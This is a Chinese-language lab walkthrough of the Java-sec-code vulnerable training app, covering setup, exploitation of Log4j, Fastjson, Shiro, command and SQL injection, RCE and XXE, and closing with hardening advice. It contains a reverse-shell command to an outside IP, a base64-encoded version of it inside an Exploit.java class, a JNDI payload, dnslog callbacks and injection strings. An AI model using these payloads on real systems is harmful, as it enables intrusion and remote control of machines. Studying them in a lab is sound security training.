Java-sec-code靶场漏洞分析与实践指南<\/h1>

环境搭建<\/h2>

基础环境要求<\/h3>
MySQL 8.0<\/li>
Java 1.8<\/li>
Maven 3.9<\/li>
IDEA开发环境<\/li> <\/ul>
搭建步骤<\/h3>
克隆项目仓库：<\/p>
git clone https:\/\/github.com\/JoyChou93\/java-sec-code
<\/span><\/span><\/code><\/pre><\/li>

修改数据库配置：<\/p>

编辑application.properties<\/code>文件<\/li>
修改数据库连接密码<\/li>
<\/ul>
<\/li>

导入数据库文件<\/p>
<\/li>

在IDEA中打开项目，直接点击run按钮运行<\/p>
<\/li>

访问本地8080端口(admin\/admin123)<\/p>
<\/li>
<\/ol>
常见问题解决<\/h3>

登录无响应问题<\/strong>：请求远程jquery.min.js报502错误

解决方案：替换为CDN链接<\/li>
<\/ul>
https:\/\/cdn.jsdelivr.net\/npm\/jquery@3.4.1\/dist\/jquery.min.js
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
漏洞分析与利用<\/h2>
1. Log4j漏洞(CVE-2021-44228)<\/h3>
漏洞位置<\/h4>

Controller层的log4j文件<\/li>
使用logger.error<\/code>记录token值<\/li>
<\/ul>
利用尝试<\/h4>


直接访问：<\/p>
http:\/\/localhost:8080\/log4j?token=${jndi:ldap:\/\/ktrpaedmrm.zaza.eu.org}
<\/code><\/pre>

结果：报400错误（包含非法字符）<\/li>
<\/ul>
<\/li>

URL编码特殊字符后访问：<\/p>

成功返回200<\/li>
<\/ul>
<\/li>
<\/ol>
反弹shell尝试<\/h4>


生成反弹shell命令：<\/p>
bash -i >& \/dev\/tcp\/189.1.226.116\/8989 0>&1<\/span>
<\/span><\/span><\/code><\/pre><\/li>

Base64编码：<\/p>
bash -c {<\/span>echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xODkuMS4yMjYuMTE2Lzg5ODkgMD4mMQ==}<\/span>|{<\/span>base64,-d}<\/span>|{<\/span>bash,-i}<\/span>
<\/span><\/span><\/code><\/pre><\/li>

编写Exploit.java：<\/p>
import<\/span> java.lang.Runtime;<\/span>
<\/span><\/span>import<\/span> java.lang.Process;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> Exploit<\/span> {<\/span>
<\/span><\/span>    public<\/span> Exploit<\/span>(){<\/span>
<\/span><\/span>        try<\/span>{<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"\/bin\/bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xODkuMS4yMjYuMTE2Lzg5ODkgMD4mMQ==}|{base64,-d}|{bash,-i}"<\/span>);<\/span>
<\/span><\/span>        }<\/span>catch<\/span>(<\/span>Exception e){<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> argv){<\/span>
<\/span><\/span>        Exploit e =<\/span> new<\/span> Exploit();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>

编译为Exploit.class并部署<\/p>
<\/li>
<\/ol>
利用失败原因<\/h4>

Java 8u191+默认禁用远程类加载<\/li>
系统属性com.sun.jndi.ldap.object.trustURLCodebase<\/code>设置为false<\/li>
测试环境为Java 1.8.0_202<\/li>
<\/ul>
其他检测方法<\/h4>

全局查找logger<\/code>关键字，检查其他可能存在CVE-2021-44228漏洞的地方<\/li>
<\/ul>
2. Fastjson漏洞<\/h3>
漏洞版本<\/h4>

项目引用1.2.24版本<\/li>
<=1.2.24版本autoType默认开启且无严格黑名单限制<\/li>
<\/ul>
审计关键词<\/h4>

JSON.parse<\/code><\/li>
JSON.parseObject<\/code><\/li>
@type<\/code> (JSON中的类名指定字段)<\/li>
Feature.SupportNonPublicField<\/code><\/li>
<\/ul>
验证方法<\/h4>

POST请求\/fastjson\/deserialize<\/code><\/li>
传输application\/json格式数据：
{
<\/span><\/span>    "@type"<\/span>:"java.net.Inet4Address"<\/span>,
<\/span><\/span>    "val"<\/span>:"k74n3o.ceye.io"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
返回200且收到dnslog响应则存在漏洞<\/li>
<\/ul>
<\/li>
<\/ol>
高版本JDK绕过<\/h4>

对于JDK 11.0.1、8u191、7u201、6u211及以上版本<\/li>
使用受害者本地的类作为恶意Reference Factory攻击RMI<\/li>
利用LDAP返回序列化数据触发Gadget<\/li>
<\/ul>
3. Shiro漏洞<\/h3>
漏洞验证<\/h4>

访问\/shiro\/deserialize<\/code>

提示"No rememberMe cookie. Right?"<\/li>
<\/ul>
<\/li>
在请求包Cookie字段添加：
;rememberMe=true
<\/code><\/pre>
<\/li>
<\/ol>
利用工具<\/h4>

使用工具进行利用<\/li>
回显模式选择TomcatEcho<\/li>
<\/ul>
注意事项<\/h4>

服务端会抛出很多异常<\/li>
<\/ul>
4. 命令注入(CmdInject)<\/h3>
Windows环境<\/h4>

需要修改源代码<\/li>
<\/ul>
利用方式<\/h4>
http:\/\/localhost:8080\/codeinject?filepath=%7Cwhoami
<\/code><\/pre>

使用|<\/code>来执行多条命令<\/li>
<\/ul>
安全过滤<\/h4>

\/codeinject\/sec<\/code>调用SecurityUtil.cmdFilter()<\/code><\/li>
只允许^[a-zA-Z0-9_<\/code>字符<\/li>
<\/ul>
5. SQL注入<\/h3>
未过滤直接拼接<\/h4>

\/sqli\/mybatis\/vuln01<\/code><\/li>
\/jdbc\/vuln<\/code><\/li>
<\/ul>
安全写法<\/h4>

\/jdbc\/sec<\/code>采用预编译：
String sql =<\/span> "select * from users where username = ?"<\/span>;<\/span>
<\/span><\/span>PreparedStatement st =<\/span> con.<\/span>prepareStatement<\/span>(<\/span>sql);<\/span>
<\/span><\/span>st.<\/span>setString<\/span>(<\/span>1<\/span>,<\/span> username);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
错误用法<\/h4>

\/jdbc\/ps\/vuln<\/code>虽然使用prepareStatement但仍直接拼接：
String sql =<\/span> "select * from users where username = '"<\/span> +<\/span> username +<\/span> "'"<\/span>;<\/span>
<\/span><\/span>PreparedStatement st =<\/span> con.<\/span>prepareStatement<\/span>(<\/span>sql);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
MyBatis漏洞<\/h4>


\/mybatis\/vuln02<\/code>：<\/p>

使用like进行模糊查询：
<select<\/span> id=<\/span>"findByUserNameVuln02"<\/span> parameterType=<\/span>"String"<\/span> resultMap=<\/span>"User"<\/span>><\/span>
<\/span><\/span>    select * from users where username like '%${_parameter}%'
<\/span><\/span><\/select><\/span>
<\/span><\/span><\/code><\/pre><\/li>
构造' or 1=1--<\/code>即可注入<\/li>
<\/ul>
<\/li>

\/mybatis\/vuln03<\/code>：<\/p>

使用${}<\/code>直接拼接order by语句：
<select<\/span> id=<\/span>"findByUserNameVuln03"<\/span> parameterType=<\/span>"String"<\/span> resultMap=<\/span>"User"<\/span>><\/span>
<\/span><\/span>    select * from users
<\/span><\/span>    <if<\/span> test=<\/span>"order != null"<\/span>><\/span>
<\/span><\/span>        order by ${order} asc
<\/span><\/span>    <\/if><\/span>
<\/span><\/span><\/select><\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
Order by注入利用方式<\/h4>


数字越界报错：<\/p>
ORDER BY 5 --
<\/code><\/pre>

若表仅4列，则报错：Unknown column '5' in 'order clause'<\/li>
<\/ul>
<\/li>

盲注探测列名：<\/p>
ORDER BY IF(database()='test', 1, (SELECT 1 UNION SELECT 2)) --
<\/code><\/pre>
<\/li>

布尔注入：<\/p>
ORDER BY IF(SUBSTRING(database(),1,1)='a', 1, 2) --
<\/code><\/pre>
<\/li>

延时注入：<\/p>
ORDER BY IF(1=1, SLEEP(2), 1) --
<\/code><\/pre>
<\/li>

报错注入：<\/p>
ORDER BY (SELECT 1 FROM (SELECT COUNT(*), CONCAT(version(), FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y)
<\/code><\/pre>
<\/li>
<\/ol>
限制与注意事项<\/h4>

无法直接联合查询(UNION)<\/li>
数字必须介于1到查询结果的列数之间<\/li>
复合语句的数据库兼容性<\/li>
<\/ul>
6. RCE(远程代码执行)<\/h3>
Runtime.exec<\/h4>

\/rce\/runtime\/exec<\/code><\/li>
<\/ul>
ProcessBuilder<\/h4>

\/rce\/ProcessBuilder<\/code><\/li>
Linux环境下可执行：
@GetMapping<\/span>(<\/span>"\/ProcessBuilder"<\/span>)<\/span>
<\/span><\/span>public<\/span> String processBuilder<\/span>(<\/span>String cmd)<\/span> {<\/span>
<\/span><\/span>    StringBuilder sb =<\/span> new<\/span> StringBuilder();<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        String[]<\/span> arrCmd =<\/span> {<\/span>"\/bin\/sh"<\/span>,<\/span> "-c"<\/span>,<\/span> cmd};<\/span>
<\/span><\/span>        ProcessBuilder processBuilder =<\/span> new<\/span> ProcessBuilder(<\/span>arrCmd);<\/span>
<\/span><\/span>        Process p =<\/span> processBuilder.<\/span>start<\/span>();<\/span>
<\/span><\/span>        \/\/ 处理输出...
<\/span><\/span><\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>        return<\/span> e.<\/span>toString<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> sb.<\/span>toString<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
JS命令执行<\/h4>

\/rce\/jscmd<\/code><\/li>
使用Nashorn的JS调用Java类：
\/\/ test.js
<\/span><\/span><\/span><\/span>(function<\/span>() {
<\/span><\/span>    var<\/span> System<\/span> =<\/span> Java<\/span>.type<\/span>("java.lang.System"<\/span>);
<\/span><\/span>    var<\/span> Runtime<\/span> =<\/span> Java<\/span>.type<\/span>("java.lang.Runtime"<\/span>);
<\/span><\/span>    Runtime<\/span>.getRuntime<\/span>().exec<\/span>("calc.exe"<\/span>);
<\/span><\/span>    return<\/span> "Command executed: "<\/span> +<\/span> System<\/span>.getProperty<\/span>("os.name"<\/span>);
<\/span><\/span>})
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
SnakeYAML反序列化<\/h4>

\/rce\/vuln\/yarm<\/code><\/li>
安全写法使用SafeConstructor<\/code><\/li>
<\/ul>
Groovy RCE<\/h4>
@GetMapping<\/span>(<\/span>"groovy"<\/span>)<\/span>
<\/span><\/span>public<\/span> void<\/span> groovyshell<\/span>(<\/span>String content)<\/span> {<\/span>
<\/span><\/span>    GroovyShell groovyShell =<\/span> new<\/span> GroovyShell();<\/span>
<\/span><\/span>    groovyShell.<\/span>evaluate<\/span>(<\/span>content);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
利用：
http:\/\/localhost:8080\/rce\/groovy?content="calc".execute()
<\/code><\/pre>
<\/li>
<\/ul>
7. XXE漏洞<\/h3>
无回显XXE<\/h4>

\/xmlReader\/vuln<\/code><\/li>
使用dnslog验证：
Content-Type: application\/xml
<\/span><\/span><!DOCTYPE root [
<\/span><\/span><\/span>    <!ENTITY xxe SYSTEM "http:\/\/0e3fa97c.log.dnslog.sbs"><\/span>
<\/span><\/span>]>
<\/span><\/span><root><\/span>&ampxxe;<\/root><\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
安全最佳实践<\/h2>


Log4j<\/strong>：<\/p>

升级到最新安全版本<\/li>
设置log4j2.formatMsgNoLookups=true<\/code><\/li>
<\/ul>
<\/li>

Fastjson<\/strong>：<\/p>

升级到最新安全版本<\/li>
关闭autotype功能<\/li>
<\/ul>
<\/li>

SQL注入防护<\/strong>：<\/p>

使用预编译语句<\/li>
严格参数绑定<\/li>
避免直接拼接SQL<\/li>
<\/ul>
<\/li>

RCE防护<\/strong>：<\/p>

避免直接执行用户输入<\/li>
使用白名单限制可执行命令<\/li>
对用户输入进行严格过滤<\/li>
<\/ul>
<\/li>

XXE防护<\/strong>：<\/p>

禁用外部实体解析<\/li>
<\/ul>
XMLReader xmlReader =<\/span> XMLReaderFactory.<\/span>createXMLReader<\/span>();<\/span>
<\/span><\/span>xmlReader.<\/span>setFeature<\/span>(<\/span>"http:\/\/apache.org\/xml\/features\/disallow-doctype-decl"<\/span>,<\/span> true<\/span>);<\/span>
<\/span><\/span>xmlReader.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-general-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span>xmlReader.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-parameter-entities"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
本指南详细介绍了Java-sec-code靶场中的各种漏洞类型及其利用方法，同时也提供了相应的防护建议。在实际开发中，应当遵循安全编码规范，避免这些常见的安全漏洞。<\/p>